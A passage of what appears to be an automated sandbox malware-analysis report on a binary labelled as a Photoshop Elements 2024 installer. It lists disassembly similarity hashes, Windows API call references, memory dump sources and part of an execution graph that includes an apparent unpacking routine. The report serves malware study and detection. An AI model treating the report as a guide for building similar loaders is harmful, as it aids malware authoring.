                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                        • String ID:
                                                                                                        • API String ID: 459529453-0
                                                                                                        • Opcode ID: 92c48f693db88d3b9ea983bd35f85ade8b92b7ef6d7586ba3d64e88db9eecc14
                                                                                                        • Instruction ID: c3a9455e4a875f84fa8c19f17439b47b8bc48a57462713b2aef09f4a1bc59a9b
                                                                                                        • Opcode Fuzzy Hash: 92c48f693db88d3b9ea983bd35f85ade8b92b7ef6d7586ba3d64e88db9eecc14
                                                                                                        • Instruction Fuzzy Hash: FD41E171A01216CFCF14DF94D885BAEBBB4FF44310F14955AE809AB381DB71AD06CB90
                                                                                                        APIs
                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 003F9319
                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 003F9342
                                                                                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 003F9355
                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 003F9372
                                                                                                        • RtlDeleteCriticalSection.NTDLL(?), ref: 003F93A9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$Delete
                                                                                                        • String ID:
                                                                                                        • API String ID: 2284602516-0
                                                                                                        • Opcode ID: e4e983c9e6b99c31b52350fdf265803276c5fec8401013ecf3f3f792576c72a0
                                                                                                        • Instruction ID: 9e679a1e8828cf7ac86724b410c29441cc9aa38fa59b695f5087bfc7af2895f2
                                                                                                        • Opcode Fuzzy Hash: e4e983c9e6b99c31b52350fdf265803276c5fec8401013ecf3f3f792576c72a0
                                                                                                        • Instruction Fuzzy Hash: B021D375A00208AFCB01DF94DCC9BAE7BB8BF95300F04006AFE0597281CB31E955DBA1
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 0053FEC6
                                                                                                          • Part of subcall function 00535D79: RtlFreeHeap.NTDLL(00000000,00000000,?,0054014F,?,00000000,?,?,?,005403F2,?,00000007,?,?,00540897,?), ref: 00535D8F
                                                                                                          • Part of subcall function 00535D79: GetLastError.KERNEL32(?,?,0054014F,?,00000000,?,?,?,005403F2,?,00000007,?,?,00540897,?,?), ref: 00535DA1
                                                                                                        • _free.LIBCMT ref: 0053FED8
                                                                                                        • _free.LIBCMT ref: 0053FEEA
                                                                                                        • _free.LIBCMT ref: 0053FEFC
                                                                                                        • _free.LIBCMT ref: 0053FF0E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: df05589b10fcddb8115cb9ab431f49714d94cb54fb5e025999b5b4c57d5125ee
                                                                                                        • Instruction ID: 3833923b1e9eb9e8a46d322c2f9bafed19fad84c5e6d7704856b74bc3c18618d
                                                                                                        • Opcode Fuzzy Hash: df05589b10fcddb8115cb9ab431f49714d94cb54fb5e025999b5b4c57d5125ee
                                                                                                        • Instruction Fuzzy Hash: 3CF0FF33915A01AB8660EB68F98AD167BEEFA86710B651C15F409D7521DF60FC808BA4
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 3213747228-0
                                                                                                        • Opcode ID: d9882d517bfb07556b4c6033952406489b9e2659707670c46957c7c589c763b3
                                                                                                        • Instruction ID: a8d7ac2026444af8089b036c937f1ef0a28502b4f55e1efd9d6cf67cc00e6631
                                                                                                        • Opcode Fuzzy Hash: d9882d517bfb07556b4c6033952406489b9e2659707670c46957c7c589c763b3
                                                                                                        • Instruction Fuzzy Hash: 1CB11272904246AFDB11CF28C891BBEBFE5FF99340F24C1ADE845AB242D6349D41CB60
                                                                                                        APIs
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002E520E
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002E5213
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002E5218
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002E521D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: 259429ce7af4a15c1ed0dfed01eff1709160ce579ea667651006bda2ee783ef3
                                                                                                        • Instruction ID: 7b779e1e2b7dce9cf6c285c463f3db7dd95f86769c05bed2bf1f76469ff06fe8
                                                                                                        • Opcode Fuzzy Hash: 259429ce7af4a15c1ed0dfed01eff1709160ce579ea667651006bda2ee783ef3
                                                                                                        • Instruction Fuzzy Hash: 9251BE71660661CFDB10DF1AC4C0A69BBE1FF49318B5581A9ED9D8F392D731D8A0CBA0
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                        • _free.LIBCMT ref: 00536475
                                                                                                        • _free.LIBCMT ref: 005364AB
                                                                                                        • SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2283115069-0
                                                                                                        • Opcode ID: 886c7c09ebfe285efb15564bd85018b05433395dcae3f1844f50d9add1300fe7
                                                                                                        • Instruction ID: 454c1e661963261e6b8ba3bf9b5fe4550b71137f563738da50302fae7b91cbdf
                                                                                                        • Opcode Fuzzy Hash: 886c7c09ebfe285efb15564bd85018b05433395dcae3f1844f50d9add1300fe7
                                                                                                        • Instruction Fuzzy Hash: 13110672A045023ACF113B746DCED2A2FAAFBCB3B1F31452CF524961D1EEB18C116620
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,0052157F,00000000,?,005215F7,00000000,00000000,00000000,00000000,00000000,00000018,0027417B,?,004024A0), ref: 0053656F
                                                                                                        • _free.LIBCMT ref: 005365CC
                                                                                                        • _free.LIBCMT ref: 00536602
                                                                                                        • SetLastError.KERNEL32(00000000,00000002,000000FF,?,005215F7,00000000,00000000,00000000,00000000,00000000,00000018,0027417B,?,004024A0,00000018,00000000), ref: 0053660D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2283115069-0
                                                                                                        • Opcode ID: bcaa1fe9c3264f25e7298b42499c8236062c8253cbbaf3c99870994f45601936
                                                                                                        • Instruction ID: 89c631b3e49d6f26666e01242bb811adde58c2dc591f114937e0ffae27b3016d
                                                                                                        • Opcode Fuzzy Hash: bcaa1fe9c3264f25e7298b42499c8236062c8253cbbaf3c99870994f45601936
                                                                                                        • Instruction Fuzzy Hash: 9F11C6722086123ADB1127785C8E92B2FAAFBCB7B5FA1427CF124961D1DEB19C056520
                                                                                                        APIs
                                                                                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 0040238C
                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 004023C7
                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 004023DC
                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 004023EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                        • String ID:
                                                                                                        • API String ID: 2978645861-0
                                                                                                        • Opcode ID: 709b8ca95de63c57acf2efb1a369e5264ddbb6e693117b4e366538269b3fb746
                                                                                                        • Instruction ID: e28dd463a6b6fdbced03d271235eef64fcece882177d4ec34972f852f1e20310
                                                                                                        • Opcode Fuzzy Hash: 709b8ca95de63c57acf2efb1a369e5264ddbb6e693117b4e366538269b3fb746
                                                                                                        • Instruction Fuzzy Hash: 600192362416008FC3208F1CF849AD7B3E9FBAA330B04862FE56683750C375A849DB70
                                                                                                        APIs
                                                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00544FBB,?,00000001,?,?,?,0053AC66,?,00000000,?), ref: 005461BA
                                                                                                        • GetLastError.KERNEL32(?,00544FBB,?,00000001,?,?,?,0053AC66,?,00000000,?,?,?,?,0053B1B2,00000000), ref: 005461C6
                                                                                                          • Part of subcall function 0054618C: CloseHandle.KERNEL32(FFFFFFFE,005461D6,?,00544FBB,?,00000001,?,?,?,0053AC66,?,00000000,?,?,?), ref: 0054619C
                                                                                                        • ___initconout.LIBCMT ref: 005461D6
                                                                                                          • Part of subcall function 0054614E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0054617D,00544FA8,?,?,0053AC66,?,00000000,?,?), ref: 00546161
                                                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00544FBB,?,00000001,?,?,?,0053AC66,?,00000000,?,?), ref: 005461EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                        • String ID:
                                                                                                        • API String ID: 2744216297-0
                                                                                                        • Opcode ID: f41c516f6f118156b143ec588ca598e5f8427b4f8cf1b396cd18740f012f2823
                                                                                                        • Instruction ID: 14c98a32bb9ee82cdb4ca06f6325add9eca45cb9c42ee43fa1d86a577579aa7b
                                                                                                        • Opcode Fuzzy Hash: f41c516f6f118156b143ec588ca598e5f8427b4f8cf1b396cd18740f012f2823
                                                                                                        • Instruction Fuzzy Hash: 5CF0AC3650012ABBCF226FD5EC09AD97F27FB9A3A5F045110FB1896121CA729860EB91
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0020F01B
                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0020F06A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                        • String ID: bad locale name
                                                                                                        • API String ID: 3988782225-1405518554
                                                                                                        • Opcode ID: 292100ea19cb49c9cf1cc4ba2c66d5fb471788ceb332b6e5dfbdb759c80b055e
                                                                                                        • Instruction ID: 5973eb3beb43fdd44b455dc92680d907f1ef52416db248e5a9d96e395998f427
                                                                                                        • Opcode Fuzzy Hash: 292100ea19cb49c9cf1cc4ba2c66d5fb471788ceb332b6e5dfbdb759c80b055e
                                                                                                        • Instruction Fuzzy Hash: 5F118C71904B849ED320CF69C905B5BBFE8FB19710F004A1EE49987B81D7B5A5048B95
                                                                                                        APIs
                                                                                                        • GetOEMCP.KERNEL32(00000000,0053ED4A,?,00000000,0053C9D9,0053C9D9,00000000,00000000,?), ref: 0053EB04
                                                                                                        • GetACP.KERNEL32(00000000,0053ED4A,?,00000000,0053C9D9,0053C9D9,00000000,00000000,?), ref: 0053EB1B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: JS
                                                                                                        • API String ID: 0-930516749
                                                                                                        • Opcode ID: c52b4ff00e5fc9ccdbde58c48aec07765749a79bc3f8bb5624bc5a149447669a
                                                                                                        • Instruction ID: 95f850b3b9c1db9a1052883033c2fc656258544552409080db825b326ae5eea2
                                                                                                        • Opcode Fuzzy Hash: c52b4ff00e5fc9ccdbde58c48aec07765749a79bc3f8bb5624bc5a149447669a
                                                                                                        • Instruction Fuzzy Hash: 82F068704102059BE711DB58E8AA7BCBBF5BB52339F740744E1269A1E1C7755CC5CB42

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:18.3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:204
                                                                                                        Total number of Limit Nodes:2
                                                                                                        execution_graph 1266 512f20 1267 512f3e 1266->1267 1278 512ed0 1267->1278 1279 512ee2 1278->1279 1280 512eef 1278->1280 1281 510a46 _ValidateLocalCookies 5 API calls 1279->1281 1281->1280 1026 b49970 1027 b49980 1026->1027 1028 b49a9a LoadLibraryA 1027->1028 1031 b49adf VirtualProtect VirtualProtect 1027->1031 1029 b49ab1 1028->1029 1029->1027 1033 b49ac3 GetProcAddress 1029->1033 1032 b49b44 1031->1032 1032->1032 1033->1029 1034 b49ad9 ExitProcess 1033->1034 1287 5853b5 1288 510a46 _ValidateLocalCookies 5 API calls 1287->1288 1289 5853c8 1288->1289 1290 510a46 _ValidateLocalCookies 5 API calls 1289->1290 1291 5853d2 1290->1291 1035 3ecfd0 1043 3ed025 1035->1043 1044 3ed2c9 1035->1044 1037 3ed3c1 1039 3ecdd0 15 API calls 1039->1043 1043->1039 1043->1044 1045 20b1c0 1043->1045 1053 20a8b0 1043->1053 1073 3eec40 RtlEnterCriticalSection 1043->1073 1082 3c6900 MultiByteToWideChar 1043->1082 1103 510a46 1044->1103 1046 20b25e 1045->1046 1047 20b1df 1045->1047 1133 209560 1046->1133 1049 20b1eb 1047->1049 1110 20b550 1047->1110 1049->1043 1051 20b232 1051->1043 1055 20a900 1053->1055 1057 20a8ce 1053->1057 1054 209560 6 API calls 1056 20a9b9 1054->1056 1059 20b550 3 API calls 1055->1059 1064 20a948 1055->1064 1058 20a9e2 1056->1058 1060 20aa38 1056->1060 1061 20ab4c 1056->1061 1057->1043 1058->1043 1059->1064 1063 20b550 3 API calls 1060->1063 1062 209560 6 API calls 1061->1062 1070 20aa7b 1062->1070 1063->1070 1064->1054 1067 20a993 1064->1067 1065 20acd0 1068 209560 6 API calls 1065->1068 1066 20abcf 1069 20b550 3 API calls 1066->1069 1067->1043 1072 20ac12 1068->1072 1069->1072 1070->1065 1070->1066 1071 20aaf2 1070->1071 1071->1043 1072->1043 1074 3eec5b 1073->1074 1077 3eec64 1073->1077 1200 3fe880 1074->1200 1076 3eec8a 1219 20a3f0 1076->1219 1077->1076 1078 510a59 3 API calls 1077->1078 1078->1076 1080 3eecb6 RtlLeaveCriticalSection 1081 3eecca 1080->1081 1081->1043 1083 3c693b 1082->1083 1084 3c69bc MultiByteToWideChar 1083->1084 1097 3c6944 1083->1097 1085 3c6a96 1084->1085 1086 3c69d6 1084->1086 1091 20a8b0 8 API calls 1085->1091 1087 3c69dd GetLastError 1086->1087 1088 3c69fa 1086->1088 1092 3c6a74 1087->1092 1089 3c6a4a 1088->1089 1090 3c6a03 GetLastError 1088->1090 1089->1092 1093 3c6a54 GetLastError 1089->1093 1094 3c6a33 1090->1094 1095 3c6aba 1091->1095 1096 521898 2 API calls 1092->1096 1093->1092 1252 521898 1094->1252 1098 521898 2 API calls 1095->1098 1099 3c6a8a 1096->1099 1097->1043 1100 3c6ac0 1098->1100 1099->1043 1100->1043 1104 510a4f IsProcessorFeaturePresent 1103->1104 1105 510a4e 1103->1105 1107 510b00 1104->1107 1105->1037 1260 510ac3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1107->1260 1109 510be3 1109->1037 1111 20b5a0 1110->1111 1112 20b55d 1110->1112 1144 209490 1111->1144 1114 20b566 1112->1114 1118 20b589 1112->1118 1114->1111 1116 20b56d 1114->1116 1115 20b573 1122 20b5e0 1115->1122 1123 20b5bd 1115->1123 1124 20b57c 1115->1124 1119 510a59 3 API calls 1116->1119 1117 20b59a 1117->1051 1118->1117 1136 510a59 1118->1136 1119->1115 1121 20b593 1121->1051 1127 20b5f1 1122->1127 1130 510a59 3 API calls 1122->1130 1125 20b5c4 1123->1125 1126 20b5f7 1123->1126 1124->1051 1129 510a59 3 API calls 1125->1129 1128 209490 Concurrency::cancel_current_task RaiseException 1126->1128 1127->1051 1132 20b5ca 1128->1132 1129->1132 1131 20b5ea 1130->1131 1131->1051 1132->1051 1165 500919 1133->1165 1138 510a5e 1136->1138 1137 510a78 1137->1121 1138->1137 1141 209490 Concurrency::cancel_current_task 1138->1141 1151 533080 1138->1151 1140 510a84 1140->1140 1141->1140 1148 51307e 1141->1148 1143 2094ac 1143->1121 1145 20949e Concurrency::cancel_current_task 1144->1145 1146 51307e std::_Xinvalid_argument RaiseException 1145->1146 1147 2094ac 1146->1147 1147->1115 1149 5130c5 RaiseException 1148->1149 1150 513098 1148->1150 1149->1143 1150->1149 1154 5330ad 1151->1154 1155 5330b9 1154->1155 1160 5325b9 RtlEnterCriticalSection 1155->1160 1157 5330c4 1161 533100 1157->1161 1160->1157 1164 532601 RtlLeaveCriticalSection 1161->1164 1163 53308b 1163->1138 1164->1163 1182 5006fa 1165->1182 1168 51307e std::_Xinvalid_argument RaiseException 1169 500938 1168->1169 1185 500734 1169->1185 1172 51307e std::_Xinvalid_argument RaiseException 1173 500958 1172->1173 1188 500777 1173->1188 1176 51307e std::_Xinvalid_argument RaiseException 1177 